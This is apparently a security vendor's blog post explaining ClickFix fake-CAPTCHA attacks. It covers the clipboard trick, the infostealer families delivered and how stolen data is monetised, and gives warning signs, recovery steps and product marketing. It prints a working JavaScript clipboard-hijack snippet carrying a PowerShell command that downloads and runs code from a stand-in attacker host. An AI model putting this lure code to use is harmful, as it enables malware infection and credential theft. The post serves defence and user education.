What ClickFix is
ClickFix is a social engineering kit that wears a CAPTCHA costume. You land on a page that looks like a normal "verify you're human" challenge. Cloudflare Turnstile logo, the familiar checkbox, maybe a progress bar. You click it. Instead of solving the CAPTCHA the page says verification failed and shows you three steps to "fix" it:
- Press Win+R on your keyboard
- Press Ctrl+V to paste
- Press Enter
What the page does not tell you is that clicking the fake CAPTCHA button quietly copied a PowerShell command to your clipboard. The Run dialog opens. You paste. You hit Enter. Windows launches PowerShell, reaches out to an attacker controlled server, downloads a payload, and runs it under your user account. No prompt. No warning. No browser download. The whole attack takes about eight seconds from "verify you're human" to malware running under your account with everything your account can reach.
The macOS variant tells you to open Terminal instead of Run, and the Linux one walks you through the same paste into a terminal window, but the pattern is identical. A page you trust tricks you into executing code you did not write.
Why every antivirus misses it
Traditional endpoint protection looks for two things: known malware signatures and suspicious process behavior. ClickFix defeats both by design.
There is no malicious file on disk when the attack starts. The delivery payload lives in a string copied to your clipboard. The process that runs it is powershell.exe, a signed Microsoft binary that no antivirus blocks by default, because it is the same interpreter every administrator and installer on the machine relies on. When PowerShell pulls the second stage, it often loads it directly into memory with Invoke-Expression or [System.Reflection.Assembly]::Load, so the stager never touches the filesystem. Fileless loading means no file to scan. The one thing Windows does see is the script text itself, handed to the Antimalware Scan Interface at runtime, which is exactly why these kits obfuscate or encode the stage that fetches the real payload.
The final nail is consent. The user typed the keystrokes. The user pasted the command. The user hit Enter. From the operating system's perspective, this is a legitimate user running a legitimate interpreter. There is no exploit, no privilege escalation, no CVE to patch. You cannot write a signature for "user followed instructions on a webpage." That is why ClickFix went from a research curiosity in 2024 to roughly 40 percent of the browser delivered malware incidents we tracked in 2026.
The exact script kit
Most ClickFix landing pages are built from the same handful of templates, sold or leaked on Telegram and forum marketplaces. The structural pattern is predictable once you have seen one. The page loads a convincing CAPTCHA shell, then when the user clicks anywhere inside the challenge box, a small script fires:
  // fires on any click inside the fake challenge box
  document.querySelector('.challenge').addEventListener('click', () => {
    const cmd = "powershell -w hidden -c \"iex (iwr 'https://[attacker-domain]/x.ps1')\"";
    // overwrites the clipboard; allowed without a prompt because it runs inside a user gesture
    navigator.clipboard.writeText(cmd);
  });
The navigator.clipboard.writeText() call is the entire trick. Browsers allow clipboard writes on user gesture without a permission prompt, which is fine for copy buttons on normal sites but perfect cover here. The moment the user clicks the fake CAPTCHA, their clipboard is overwritten.
A second layer fades in the "verification failed" panel after a short delay, usually between 600 and 1200 milliseconds. That delay is deliberate. It makes the failure feel like a real CAPTCHA timing out rather than an instant fake. The instructions panel then walks the user through Win+R, Ctrl+V, Enter, sometimes with a fake "robot ID" string like ray-id: 7a3f... appended to the command to make the pasted text look like diagnostic input rather than a shell command.
Variants swap powershell for mshta, a curl download piped into iex, or base64 encoded blobs (PowerShell's -EncodedCommand flag takes one directly). The base64 ones read as gibberish in the Run dialog, which actually helps the attacker because confused users are more likely to follow the "just hit Enter" instruction without reading.
Who's running these campaigns
ClickFix is not one group. It is a delivery mechanism used by dozens of affiliates feeding a handful of malware families. The traffic side runs through compromised WordPress sites, malvertising on ad networks with weak review, SEO poisoning on long tail crypto and software download queries, and increasingly through fake Google Meet and Zoom invite links.
Domain rotation is aggressive. A typical campaign burns through a fresh domain every 24 to 72 hours to stay ahead of blocklists. Domains are usually registered through resellers that accept crypto, hosted on bulletproof providers, and fronted by Cloudflare to hide the origin.
On the payload side, the most common families we see delivered by ClickFix pages are Vidar, RedLine, Lumma, StealC, and ACR Stealer. All of them are info-stealers. They are rented as a service, typically 150 to 500 USD per month per operator, which keeps the barrier to entry low. The same ClickFix page can deliver different payloads depending on geolocation, browser fingerprint, or which affiliate is running traffic that hour.
How the malware gets monetized
Once the PowerShell one-liner runs, the info-stealer does its work in under a minute. It targets a predictable list of high value data:
- Saved passwords from Chrome, Firefox, Edge, Brave, Opera, and every Chromium fork
- Session cookies, which are more valuable than passwords because they represent logins that have already passed two factor authentication
- Browser extension wallet storage: MetaMask, Phantom, Rabby, Rainbow, Keplr, and thirty plus others
- Desktop wallet files: Exodus, Electrum, Atomic, Ledger Live
- Discord, Telegram, and Steam session tokens
- Autofill data including credit cards and addresses
- Screenshots of the desktop at moment of infection
The stolen data is packaged into a "log" and uploaded to a command and control server. From there it hits one of three paths. Crypto wallets with balances are drained within minutes, usually by an automated draining bot that sweeps any hot wallet with seed phrases in plaintext extension storage. Session cookies for high value accounts like email, exchanges, and cloud providers are resold individually on markets like Russian Market or Genesis for anywhere from 5 to 500 USD each. The bulk logs, often containing credentials for hundreds of sites per victim, are sold in bundles to credential stuffing operators who test them against banking, streaming, and shopping sites for account takeover.
A single successful ClickFix infection on a crypto user is worth on average 2800 USD to the operator based on drain data we have tracked. On a non crypto user it is closer to 40 USD through credential resale. Both numbers are high enough to keep the attack profitable at scale.
The 4 signs you're looking at ClickFix right now
- The CAPTCHA instructions involve Win+R, Terminal, or PowerShell. No legitimate CAPTCHA in the history of the internet has ever asked you to open a shell. Cloudflare Turnstile, Google reCAPTCHA, and hCaptcha all work entirely inside the page. If a human verification step tells you to press keyboard shortcuts that open system dialogs, close the tab.
- The page says verification failed and asks you to run a script. Real CAPTCHAs fail silently or retry. They never hand you a command and say "paste this to prove you're human." That phrasing alone is a ClickFix tell.
- The URL is a doppelganger of a legitimate service you don't actually use. Common ClickFix lures imitate Cloudflare challenge pages, Google Meet joins, Zoom updates, DocuSign verifications, and fake browser update prompts. If you arrived at a "Cloudflare challenge" without visiting a site that uses Cloudflare, something is wrong.
- Your clipboard suddenly contains a shell command. If you ever land on a suspect page and want to check, open Notepad and paste. Notepad only displays text, it never runs it. If what comes out starts with powershell, mshta, cmd /c, curl, or a long base64 string, you were targeted. Do not paste it anywhere else. Clear your clipboard and walk away.
What to do if you already ran it
Assume full compromise. Work through these seven steps in order, from a different device if possible.
- Disconnect the infected machine from the internet. Unplug the ethernet cable or turn off Wi-Fi. This stops any active data exfiltration and cuts off the C2 channel before more damage is done.
- Run a full scan with two engines. Malwarebytes plus Windows Defender offline scan is a good free combination. Many info-stealers run once and exit, but some drop a loader with persistence that only a full boot time scan will catch.
- Change every password that was saved in a browser on that machine, plus anything you typed in the last 24 hours. The stealer takes the whole saved password store, not just recent logins. Start with your primary email, because whoever has that can reset everything else. Then banking, crypto exchanges, password manager master password, and any account with payment data. Use the clean device, not the infected one.
- Revoke all active sessions. Most services have a "sign out all devices" option in security settings. Do this for Google, Apple, Microsoft, Discord, your password manager, and every exchange you use. Cookies stolen before you changed the password still work until sessions are killed.
- Move any crypto to a fresh wallet. Generate a new seed on a clean device, ideally hardware if you have one available. Transfer funds out of any hot wallet that was on the compromised machine. Do not reuse the old seed, ever, even after a clean reinstall. Assume it is in a database on a stealer server.
- Check bank and crypto transactions for the next 48 hours. Enable every fraud alert your bank offers. Watch on-chain addresses for unusual outflows. Contact your bank preemptively if you entered card details on the infected machine during that window.
- Consider a full OS reinstall. If the compromised account has access to anything important, flatten the machine. A wiped and reinstalled OS is the only way to be certain no persistence remains. Back up documents to external media, scan them separately, and restore after the reinstall rather than using a system image.
For crypto specific recovery, see our step by step guide on what to do when your seed phrase has been stolen.
How SafeBrowz catches ClickFix specifically
We built three independent layers against this attack class because any single defense can be bypassed. The first two run in the free extension; the third is Premium only.
Layer 1: Domain blocklist. Every known ClickFix delivery domain, staging server, and command and control endpoint we track is pushed to the extension on a six hour refresh cycle. The list is sourced from our own crawlers, partner threat feeds, and community submissions. If a page loads from a known bad domain, the request is blocked before the HTML ever renders. For context on how domain detection generally works, see our primer on how to tell if a website is a scam.
Layer 2: Content pattern detection. Blocklists lag fresh domains by hours or days. To catch pages we have never seen, the extension scans page content pre-render for ClickFix fingerprints: the Win+R instruction language in any of 100 plus supported languages, calls to navigator.clipboard.writeText inside click handlers, fake verification failed panels, and combinations of CAPTCHA branding with shell command text. AI content analysis runs on anything suspicious and flags it even when the page does not match a known template. This catches zero day ClickFix variants in the wild.
Layer 3: Clipboard hijack guard (Premium). The nuclear option. Any page that tries to write to the clipboard without a clearly intentional click on a visible copy button is blocked and the user is shown what the page tried to copy. This stops the entire attack chain at the exact moment the malicious command would hit your clipboard, regardless of domain reputation or content patterns.
The deeper technical breakdown of our ClickFix defenses lives on the ClickFix protection page.
Frequently asked questions
Does SafeBrowz work on Mac?
Yes. The extension blocks the ClickFix delivery site at the browser layer, which works the same on Mac, Windows, Linux, and ChromeOS. The malware payload happens to target Windows most often, but you are protected from landing on the page in the first place regardless of operating system.
Is the free tier enough?
For most users, yes. The blocklist and content pattern detection layers catch the vast majority of ClickFix pages and are free forever. The clipboard hijack guard in Premium is the last line of defense for users who want belt and suspenders protection, especially anyone holding meaningful crypto.
I visited a ClickFix page but didn't run anything. Am I safe?
Yes, as long as you never pasted and ran the command. Simply viewing the page does nothing. The attack requires you to press Win+R, paste, and press Enter. If you closed the tab without following the instructions, no code ran on your machine. The page probably did overwrite your clipboard, so clear it before you paste anywhere else and move on.
How common is ClickFix compared to traditional phishing?
In 2026, roughly 40 percent of browser delivered malware incidents we track involve a ClickFix variant. Traditional credential phishing is still larger overall, but ClickFix is growing fastest because it defeats antivirus and two factor authentication simultaneously. Expect it to keep climbing.
Why don't browsers block this natively?
Because technically nothing in the browser is broken. The user clicked a button. The page wrote to the clipboard on a user gesture, which is allowed. The user then opened their own shell and pasted. From Chrome's perspective, every step is a legitimate action. Defense has to live one layer up, which is where a dedicated extension matters.
Install SafeBrowz free. Cross browser, 420 plus tracked brands, AI content analysis in 100 plus languages, and yes the ClickFix defenses described above. No account needed.